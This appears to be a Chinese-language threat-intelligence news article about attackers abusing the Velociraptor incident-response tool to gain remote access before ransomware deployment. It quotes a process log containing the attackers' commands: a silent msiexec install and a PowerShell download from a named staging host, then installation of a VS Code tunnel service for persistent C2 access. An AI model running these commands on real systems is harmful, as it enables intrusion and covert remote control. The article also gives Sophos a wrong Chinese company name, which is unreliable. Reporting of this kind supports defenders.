威胁行为者滥用 Velociraptor 事件响应工具获取远程访问权限

这标志着攻击者的战术从长期滥用 “远程监控与管理工具（RMM 工具）” 向新方向演变 —— 如今攻击者开始重新利用 DFIR 框架，以减少定制化恶意软件的部署，进而规避安全检测。

攻击过程中，攻击者借助 Windows 系统原生的 msiexec 工具（Windows 安装程序执行工具），从 Cloudflare Workers（Cloudflare 的无服务器计算平台）托管的暂存域 “files.qaubctgg.workers.dev” 下载并安装了恶意的 Velociraptor MSI 安装包。

（以下为进程执行路径记录，展示 Velociraptor 创建 Visual Studio Code 隧道的过程）：
    \Device\HarddiskVolume2\Windows\System32\wininit.exe
    wininit.exe → \Device\HarddiskVolume2\Windows\System32\services.exe
    C:\Windows\system32\services.exe
    \Device\HarddiskVolume2\Program Files\Velociraptor\Velociraptor.exe –config “C:\Program Files\Velociraptor/client.config.yaml” service run →         \Device\HarddiskVolume2\Windows\System32\cmd.exe /c
    “C:\ProgramData\code.exe tunnel –accept-server-license-terms service install > c:\users\public\i.log”
   \Device\HarddiskVolume2\Windows\System32\cmd.exe /c “msiexec /q /i https://files.qaubctgg.workers.dev/sc.msi“

  \Device\HarddiskVolume2\Windows\System32\cmd.exe /c “type c:\users\public\i.log”
 \Device\HarddiskVolume2\Windows\System32\cmd.exe /c “type c:\users\public\i.log”
 \Device\HarddiskVolume2\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -encodedCommand Invoke-WebRequest -Uri “https://files.qaubctgg.workers.dev/code.exe” -OutFile “C:\ProgramData\code.exe”

通过将 code.exe 安装为 Windows 服务，并将其输出重定向到日志文件，威胁行为者成功建立了一条通往攻击者 C2 基础设施的 “持久化加密隧道”。

根据 Sophos（梭子鱼网络安全公司）的调查，这种技术能够绕过许多传统安全控制措施 —— 因为 Visual Studio Code 的隧道功能通常被开发者合法用于远程协作，难以被识别为恶意行为。

针对此次事件，CTU（网络威胁情报团队）分析师为受影响机构提供了缓解指南，助力其快速隔离受感染主机。这一遏制措施成功阻止了攻击者推进至最终目标 —— 部署勒索软件。

尽管 “通过滥用 RMM 工具获取远程访问权限” 是一种常见战术（此前在涉及 SimpleHelp 漏洞和基于虚拟机的工具的事件中均有记录），但此次事件是已观测到的 “DFIR 软件本身被武器化” 的首批案例之一。

通过转向滥用 Velociraptor，攻击者减少了对定制化恶意软件的依赖，既降低了自身的操作痕迹，也增加了安全人员追溯攻击源头的难度。

CTU 的分析表明，此类攻击手法很可能是部署勒索软件的 “前兆”。因此，建议各机构采取以下措施：

安全团队应审查并限制对以下域的访问，同时警惕与这些可能包含恶意内容的域进行交互所带来的风险。

若将 “未经授权使用事件响应工具” 视为高风险事件，并采取分层检测与防御措施，各机构便能显著降低此类攻击的影响，在攻击者部署勒索软件前阻止其行动。